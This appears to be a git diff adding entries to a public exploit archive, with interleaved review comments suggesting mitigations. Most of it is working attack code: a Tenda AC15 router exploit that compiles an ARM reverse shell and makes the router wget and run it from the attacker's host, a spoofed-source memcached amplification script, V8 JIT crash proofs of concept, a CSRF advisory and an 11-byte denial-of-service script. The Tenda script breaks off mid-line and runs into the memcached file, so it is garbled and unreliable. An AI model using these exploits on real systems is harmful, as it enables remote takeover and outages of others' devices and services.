diff --git a/exploits/hardware/remote/44253.py b/exploits/hardware/remote/44253.py
new file mode 100755
index 000000000..7bdb6cb4d
--- /dev/null
+++ b/exploits/hardware/remote/44253.py
@@ -0,0 +1,243 @@
+#!/usr/bin/env python
+# EDB Note ~ Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
+import urllib2
+import struct
+import time
+import socket
+from optparse import *
+import SimpleHTTPServer
+import SocketServer
+import threading
+import sys
+import os
+import subprocess
+
+ARM_REV_SHELL = (
+"#include \n"
+"#include \n"
+"#include \n"
+"#include \n"
+"#include \n"
+"int main(int argc, char **argv)\n"
+"{\n"
+" struct sockaddr_in addr;\n"
+" socklen_t addrlen;\n"
+" int sock = socket(AF_INET, SOCK_STREAM, 0);\n"
+
+" memset(&addr, 0x00, sizeof(addr));\n"
+
+" addr.sin_family = AF_INET;\n"
+" addr.sin_port = htons(%d);\n"
+" addr.sin_addr.s_addr = inet_addr(\"%s\");\n"
+
+" int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n"
+
+" dup2(sock, 0);\n"
+" dup2(sock, 1);\n"
+" dup2(sock, 2);\n"
+
+" system(\"/bin/sh\");\n"
+"}\n"
+)
+
+REV_PORT = 31337
+HTTPD_PORT = 8888
+DONE = False
+
+"""
+* This function creates a listening socket on port
+* REV_PORT. When a connection is accepted it updates
+* the global DONE flag to indicate successful exploitation.
+* It then jumps into a loop whereby the user can send remote
+* commands to the device, interacting with a spawned /bin/sh
+* process.
+"""
+def threaded_listener():
+ global DONE
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
+
+ host = ("0.0.0.0", REV_PORT)
+
+ try:
+ s.bind(host)
+ except:
+ print "[+] Error binding to %d" %REV_PORT
+ return -1
+
+
+ print "[+] Connect back listener running on port %d" %REV_PORT
+
+ s.listen(1)
+ conn, host = s.accept()
+
+ #We got a connection, lets make the exploit thread aware
+ DONE = True
+
+ print "[+] Got connect back from %s" %host[0]
+ print "[+] Entering command loop, enter exit to quit"
+
+ #Loop continuosly, simple reverse shell interface.
+ while True:
+ print "#",
+ cmd = raw_input()
+ if cmd == "exit":
+ break
+ if cmd == '':
+ continue
+
+ conn.send(cmd + "\n")
+
+ print conn.recv(4096)
+
+"""
+* Take the ARM_REV_SHELL code and modify it with
+* the given ip and port to connect back to.
+* This function then compiles the code into an
+* ARM binary.
+@Param comp_path – This should be the path of the cross-compiler.
+@Param my_ip – The IP address of the system running this code.
+"""
+def compile_shell(comp_path, my_ip):
+ global ARM_REV_SHELL
+ outfile = open("a.c", "w")
+
+ ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)
+
+ outfile.write(ARM_REV_SHELL)
+ outfile.close()
+
+ compile_cmd = [comp_path, "a.c","-o", "a"]
+
+ s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
+
+ while s.poll() == None:
+ continue
+
+ if s.returncode == 0:
+ return True
+ else:
+ print "[x] Error compiling code, check compiler? Read the README?"
+ return False
+
+"""
+* This function uses the SimpleHTTPServer module to create
+* a http server that will serve our malicious binary.
+* This function is called as a thread, as a daemon process.
+"""
+def start_http_server():
+ Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
+ httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler)
+
+ print "[+] Http server started on port %d" %HTTPD_PORT
+ httpd.serve_forever()
+
+
+"""
+* This function presents the actual vulnerability exploited.
+* The Cookie header has a password field that is vulnerable to
+* a sscanf buffer overflow, we make use of 2 ROP gadgets to
+* bypass DEP/NX, and can brute force ASLR due to a watchdog
+* process restarting any processes that crash.
+* This function will continually make malicious requests to the
+* devices web interface until the DONE flag is set to True.
+@Param host – the ip address of the target.
+@Param port – the port the webserver is running on.
+@Param my_ip – The ip address of the attacking system.
+"""
+def exploit(host, port, my_ip):
+ global DONE
+ url = "http://%s:%s/goform/exeCommand"%(host, port)
+ i = 0
+
+ command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" %(my_ip, HTTPD_PORT)
+
+ #Guess the same libc base continuosly
+ libc_base = ****
+ curr_libc = libc_base + (0x7c << 12)
+
+ system = struct.pack(".
+#
+# This was created to better understand the memcrashed exploit
+# brought to light thanks to CloudFlare.
+# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
+#
+# Please sysadmin responsibly.
+
+import requests
+import memcache
+import re
+
+from scapy.all import *
+
+# Vulnerable memcached server list
+SERVER_LIST = [
+ '172.17.0.2:11211',
+]
+
+# Destination
+TARGET = '1.2.3.4'
+
+# optional payload to set if no keys exist
+payload = requests.get('https://google.com').text
+payload_key = 'fuckit'
+
+# this forces payload to load into memory for being extra-evil and efficient
+if not payload:
+ print 'Could not import payload, continuing anyway'
+
+try:
+ for server in SERVER_LIST:
+ if ':' in server:
+ server = server.split(':')[0]
+
+ ip = IP(src=TARGET, dst=server)
+ packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'
+
+ # fetch known keys by id
+ statitems_packet = packet_base.format('stats items')
+ udp = UDP(sport=50000, dport=11211)/statitems_packet
+ keyids = []
+ resp = sr1(ip/udp)
+ for key in str(resp.payload).split('\r\n'):
+ # Skip first line which has hex in it (I'm lazy)
+ if 'age' in key:
+ key = key.split(':')[1]
+ keyids.append(key)
+
+ # fetch names for keys by id
+ keys = []
+ for kid in keyids:
+ query = 'stats cachedump {0} 100'.format(kid)
+ keyid_packet = packet_base.format(query)
+ udp = UDP(sport=50000, dport=11211)/keyid_packet
+ resp = str(sr1(ip/udp).payload).split('\r\n')
+ for key in resp:
+ if 'ITEM' in key:
+ res = re.match(r"(.*)ITEM (?P\w+)(.*)",key)
+ keys.append(res.group('keyname'))
+
+ # if keys not present on target, make one
+ if not keys:
+ mc = memcache.Client([server],debug=False)
+ mc.set(payload_key, payload)
+ keys.append(payload_key)
+
+ # iterate thru known keys and blast away
+ for key in keys:
+ query = 'get {0}'.format(key)
+ fun_packet = packet_base.format(query)
+ udp = UDP(sport=50000, dport=11211)/fun_packet
+ sr1(ip/udp)
+
+except Exception:
+ raise
\ No newline at end of file
diff --git a/exploits/multiple/dos/44257.js b/exploits/multiple/dos/44257.js
new file mode 100644
index 000000000..b0accbbe9
--- /dev/null
+++ b/exploits/multiple/dos/44257.js
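Review bot: The header comment of the memcached script (the part visible here ends at "Please sysadmin responsibly") gives an operator of an exposed server nothing to act on, although the code makes the exposure clear: it sends UDP requests to port 11211 with the source address set to `TARGET`, so any memcached instance answering UDP from untrusted networks can be used as a reflector. I would add a comment such as `# Mitigation: run memcached with UDP disabled (-U 0), bind it to a trusted interface (-l 127.0.0.1), and filter 11211/udp at the network edge.` so the archived file documents the fix next to the demonstration. The top of this file is cut off in this view, so the header may already say more than what is shown.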
@@ -0,0 +1,72 @@
+/*
+I think this commit has introduced the bugs: https://chromium.googlesource.com/v8/v8/+/c22ca7f73ba92f22d0cd29b06bb2944a545a8d3e%5E%21/#F0
+
+Here's a snippet.
+ case IrOpcode::kStoreField: {
+ FieldAccess access = FieldAccessOf(node->op());
+ Node* value_node = node->InputAt(1);
+ NodeInfo* input_info = GetInfo(value_node);
+ MachineRepresentation field_representation =
+ access.machine_type.representation();
+
+ // Make sure we convert to Smi if possible. This should help write
+ // barrier elimination.
+ if (field_representation == MachineRepresentation::kTagged &&
+ TypeOf(value_node)->Is(Type::SignedSmall())) {
+ field_representation = MachineRepresentation::kTaggedSigned;
+ }
+ WriteBarrierKind write_barrier_kind = WriteBarrierKindFor(
+ access.base_is_tagged, field_representation, access.offset,
+ access.type, input_info->representation(), value_node);
+
+ ProcessInput(node, 0, UseInfoForBasePointer(access));
+ ProcessInput(node, 1,
+ TruncatingUseInfoFromRepresentation(field_representation));
+ ProcessRemainingInputs(node, 2);
+ SetOutput(node, MachineRepresentation::kNone);
+ if (lower()) {
+ if (write_barrier_kind < access.write_barrier_kind) {
+ access.write_barrier_kind = write_barrier_kind;
+ NodeProperties::ChangeOp(
+ node, jsgraph_->simplified()->StoreField(access));
+ }
+ }
+ return;
+ }
+
+Since Smi stores can be performed without write barriers, if it's possible to convert to Smi, it tries to help write barrier elimination by changing field_representation to MachineRepresentation::kTaggedSigned as noted in the comment. But whether or not field_representation has changed, it uses TruncatingUseInfoFromRepresentation to process the value node.
+
+But TruncatingUseInfoFromRepresentation(kTaggedSigned) returns UseInfo::AnyTagged() which is also compatible with kTaggedPointer. So even in the case where input_info->representation() is kTaggedPointer and the value is a heap object, it may eliminate the write barrier.
+
+Note: It's the same when handling kStoreElement.
+
+PoC 1 using kStoreField.
+*/
+
+var a, b; // should be var
+for (var i = 0; i < 100000; i++) {
+ b = 1;
+ a = i + -0; // -0 is a number, so this will make "a" a heap object.
+ b = a;
+}
+
+print(a === b); // true
+gc();
+print(a === b); // false
+print(b);
+
+/*
+PoC 2 using kStoreElement.
+let arr = [{}];
+var v; // should be var
+for (var i = 0; i < 700000; i++) {
+ arr[0] = 1;
+ v = i + -0;
+ arr[0] = v;
+}
+
+print(arr[0] === v) // true
+gc();
+print(arr[0] === v) // false
+print(arr[0]);
+*/
\ No newline at end of file
diff --git a/exploits/multiple/dos/44258.js b/exploits/multiple/dos/44258.js
new file mode 100644
index 000000000..27a19f793
--- /dev/null
+++ b/exploits/multiple/dos/44258.js
@@ -0,0 +1,31 @@
+/*
+I think this commit has introduced the bug.
+https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2
+
+According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".
+
+The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
+ if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
+ return NoChange();
+ }
+ instance_map = Map::GetObjectCreateMap(prototype_const);
+
+PoC:
+*/
+
+var object;
+function opt() {
+ opt['x'] = 1.1;
+ try {
+ Object.create(object);
+ } catch (e) {
+ }
+
+ for (let i = 0; i < 1000000; i++) {
+
+ }
+}
+
+opt();
+object = opt;
+opt();
\ No newline at end of file
diff --git a/exploits/multiple/dos/44259.js b/exploits/multiple/dos/44259.js
new file mode 100644
index 000000000..dca53a163
--- /dev/null
+++ b/exploits/multiple/dos/44259.js
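Review bot: The header comment of 44257.js links the commit believed to have introduced the bug but never says which V8 or Chrome builds are affected or which change fixes it, so someone triaging from this file cannot tell whether a given deployment is exposed or already patched. I would add a line to the comment block along the lines of `Affected: <V8/Chrome versions>; fixed in: <fix commit or release>` with the values taken from the upstream tracker entry. The same gap applies to 44258.js, 44259.js and 44260.js in this diff, none of which name a fix or a tracker reference in the lines shown.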
@@ -0,0 +1,47 @@
+PoC:
+function* opt(arg = () => arg) {
+ let tmp = opt.x; // LdaNamedProperty
+ for (;;) {
+ arg;
+ yield;
+
+ function inner() {
+ tmp;
+ }
+
+ break;
+ }
+}
+
+for (let i = 0; i < 100000; i++) {
+ opt();
+}
+
+/*
+PoC for release build:
+function* opt(arg = () => {
+ arg;
+ this;
+}, opt) {
+ let tmp = arg.x;
+ for (;;) {
+ arg;
+ yield;
+
+ tmp = {
+ inner() {
+ tmp;
+ }
+ };
+ }
+}
+
+for (let i = 0; i < 10000; i++) {
+ opt();
+}
+
+What happened:
+1. The LdaNamedProperty operation "opt.x" was lowered to a graph exit in the graph builder. This set the current environment to nullptr (BytecodeGraphBuilder::ApplyEarlyReduction).
+2. The environment for the next block (for-loop) was supposed to be created from merging with the previous environment, but it had been set to nullptr at 1. So the context value remained as "undefined".
+3. But GetSpecializationContext directly casted the context value to Context* which resulted in type confusion.
+*/
\ No newline at end of file
diff --git a/exploits/multiple/dos/44260.js b/exploits/multiple/dos/44260.js
new file mode 100644
index 000000000..8a6784b0a
--- /dev/null
+++ b/exploits/multiple/dos/44260.js
@@ -0,0 +1,57 @@
+/*
+In the current implementation, the bytecode generator also emits empty jump tables.
+https://cs.chromium.org/chromium/src/v8/src/interpreter/bytecode-array-writer.cc?rcl=111e990462823c9faeee06b67c0dcf05749d4da8&l=89
+
+So the bytecode for the example code would be generated as follows:
+Code:
+function* opt() {
+ for (;;)
+ if (true) {
+
+ } else {
+ yield; // never reaches, never hits BindJumpTableEntry
+ }
+}
+
+Bytecode:
+ ...
+ 0x35dda532a2a5 @ 75 : 90 04 01 01 SwitchOnSmiNoFeedback [4], [1], [1] { } <<--- SIZE: 1, but EMPTY
+ ...
+
+
+Here's a snippet of JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid which is used to enumerate a jump table.
+void JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid() {
+ if (table_offset_ >= table_end_) return;
+
+ current_ = accessor_->GetConstantAtIndex(table_offset_);
+ Isolate* isolate = accessor_->bytecode_array()->GetIsolate();
+ while (current_->IsTheHole(isolate)) {
+ ++table_offset_;
+ ++index_;
+ current_ = accessor_->GetConstantAtIndex(table_offset_);
+ }
+}
+
+If the jump table is empty, table_offset_ may exceed table_end_. As a result, out-of-bounds reads occur.
+
+PoC:
+*/
+
+function* opt() {
+ for (;;)
+ if (true) {
+
+ } else {
+ yield;
+ }
+
+ for (;;)
+ if (true) {
+
+ } else {
+ yield; yield; yield; yield; yield; yield; yield; yield;
+ }
+}
+
+for (let i = 0; i < 100000; i++)
+ opt();
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44256.html b/exploits/multiple/webapps/44256.html
new file mode 100644
index 000000000..dfc2409e5
--- /dev/null
+++ b/exploits/multiple/webapps/44256.html
@@ -0,0 +1,98 @@ +Exploit Title: Bravo Tejari Web Portal-CSRF +CVE-ID: CVE-2018-7216 +Vulnerability Type: Cross Site Request Forgery (CSRF) +Vendor of Product: Tejari +Affected Product Code Base: Bravo Solution +Affected Component: Web Interface Management. +Attack Type: Local - Authenticated +Impact: Unauthorised Access +Category: WebApps +Author: Arvind V. +Author Social: @Find_Arvind + +Vulnerability Type: Cross Site Request Forgery (CSRF) +Vendor of Product: Tejari +Affected Product Code Base: Bravo Solution +Affected Component: Web Interface Management. +Attack Type: Local - Authenticated +Impact: Unauthorised Access + +Product description: +Bravo Tejari is a strategic procurement platform that enables organizations +to generate more value, influence innovation and reduce risk powered by a +unique supplier-centered approach that integrates supplier lifetime value +throughout the entire procurement process + +Attack Scenario: +The Web Interface of the Bravo Tejari procurement portal does not use +random tokens to block any kind of forged requests. An atacker can take +advantage of this scenario and create a forged request to edit user account +details like name, address of the company/individual, email address etc. He +then uses social engineering techniques to target specific individuals +whose account details he would like to change. He simply sends the link and +tricks the user into clicking the forged http request. The request is +executed and user account details are changed without his knowledge. + +Proof of Concept Code: +Forged HTTP Request used by the attacker: + + + +
+ + + + + + + + + + + + + + + + + + + + +
+ + + + +Impact: +The affected product is a procurement portal and so all communication +regarding the contract lifecycle process is sent to user details provided +on the portal. If this vulnerability is sucessfully exploited, the attacker +will be able to change these details which will potentially affect the +victim's business. + +Recommendation: +Ensure that all sensitive CRUD Operations are appropriately protected with +random tokens. Alternatively, the sensitive operations should also have an +authentication layer to confirm user verification. + +References: +http://seclists.org/fulldisclosure/2018/Feb/44 +https://packetstormsecurity.com/files/146409/Tejari-Cross-Site-Request-Forgery.html + +https://www.securityfocus.com/archive/1/541782/30/0/threaded + +Credit: Arvind Vishwakarma +http://ultimateone1.blogspot.ae/ + + + +Vulnerability Timeline: +12th December 2017 – Vulnerability Discovered +23rd December 2017 – Contacted Vendor – No Response +7th January 2018 – Contacted Vendor again – No Response +15th February 2018 – Vulnerability Disclosed \ No newline at end of file diff --git a/exploits/windows/dos/44255.txt b/exploits/windows/dos/44255.txt new file mode 100644 index 000000000..4daa50742 --- /dev/null +++ b/exploits/windows/dos/44255.txt 
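Review bot: The Recommendation section of 44256.html stops at "random tokens" and an unspecified "authentication layer", which is too loose for a developer to implement correctly. It should state that the anti-CSRF token must be unpredictable, bound to the user's session and verified server-side on every state-changing request, that `SameSite` cookies and Origin/Referer validation are useful additional layers, and that changes to e-mail or address should require the current password again. Separately, `Attack Type: Local - Authenticated` contradicts the Attack Scenario, which describes a remote attacker relying on the victim's authenticated session, and the header block from "Vulnerability Type" to "Impact" appears twice.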
@@ -0,0 +1,109 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt
+[+] ISR: Apparition Security
+
+
+Vendor:
+=============
+www.softros.com
+https://nts.softros.com/downloads/
+
+
+Product:
+===========
+Network Time System Server v2.3.4
+Both x86/x64 versions
+
+
+Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a
+virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those
+maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex
+routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment
+establishing an interconnected time synchronization system for each and every machine and device on the company network.
+
+
+Vulnerability Type:
+===================
+Denial Of Service
+
+
+
+CVE Reference:
+==============
+CVE-2018-7658
+
+
+Security Issue:
+================
+Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the
+Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization
+could then potentially be impacted.
+
+
+Stack dump:
+
+'''
+eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
+eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
+NTSServerSvc+0x69a5:
+004069a5 880a mov byte ptr [edx],cl ds:0023:00000000=??
+Resetting default scope
+
+FAULTING_IP:
+NTSServerSvc+69a5
+004069a5 880a mov byte ptr [edx],cl
+
+EXCEPTION_RECORD: (.exr -1)
+ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5)
+ ExceptionCode: c0000005 (Access violation)
+
+'''
+
+
+Exploit/POC:
+=============
+import socket
+#Network Time System (Server) NTSServerSvc.exe v2.3.4
+#Softros Systems
+#NTS Server service for time synchronization over network
+
+print 'Network Time Server 11 byte Denial Of Service'
+print 'by hyp3rlinx'
+HOST=raw_input('Network Time Server IP')
+PORT=7001
+payload='A'*11
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((HOST,PORT))
+s.send(payload)
+s.close()
+
+
+
+Network Access:
+===============
+Remote
+
+
+Severity:
+=========
+Medium
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: February 10, 2018
+Second attempt : February 24, 2018
+Request CVE, assigned by Mitre : March 3, 2018
+March 5, 2018: Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 44dd04c66..51e510565 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
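Review bot: The advisory in 44255.txt records two vendor notifications and the disclosure date but says nothing about a fixed version or a workaround, which is the first thing an operator running NTSServerSvc needs to know. Until a patched build is confirmed, I would add a short "Mitigation" section stating that TCP port 7001 should be reachable only from hosts that need time synchronisation, and that the service should be monitored for unexpected termination (the dump shows access violation c0000005 at NTSServerSvc+0x69a5). The Disclosure Timeline should also say explicitly whether the vendor ever replied, since "Second attempt" only implies that it did not.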
@@ -5890,6 +5890,12 @@ id,file,description,date,author,type,platform,port
 44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
 44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
 44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
+44254,exploits/linux/dos/44254.py,"Memcached - 'memcrashed' Denial of Service",2018-03-05,"Alex Conrey",dos,linux,11211
+44255,exploits/windows/dos/44255.txt,"Softros Network Time System Server 2.3.4 - Denial of Service",2018-03-06,hyp3rlinx,dos,windows,
+44257,exploits/multiple/dos/44257.js,"Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug",2018-03-06,"Google Security Research",dos,multiple,
+44258,exploits/multiple/dos/44258.js,"Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_",2018-03-06,"Google Security Research",dos,multiple,
+44259,exploits/multiple/dos/44259.js,"Chrome V8 JIT - 'GetSpecializationContext' Type Confusion",2018-03-06,"Google Security Research",dos,multiple,
+44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
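Review bot: The new row for 44255 leaves the `port` column empty even though the advisory added in this same commit states that the service listens on port 7001; the row should end `...,dos,windows,7001`, as the 44254 row does with `11211`, so that port-based lookups against the index find it. In the 44257 description, `Simplified-lowererer` looks like a typo (probably `Simplified-lowerer`) and will not match a search for the component name.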
@@ -16299,6 +16305,7 @@ id,file,description,date,author,type,platform,port
 44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
 44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
 44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
+44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38564,7 +38571,7 @@ id,file,description,date,author,type,platform,port
 42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
 42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
 42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
-42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
+42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
 42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
 42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
 42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
@@ -38961,4 +38968,5 @@ id,file,description,date,author,type,platform,port
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
 44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
 44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
-44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
+44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
+44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,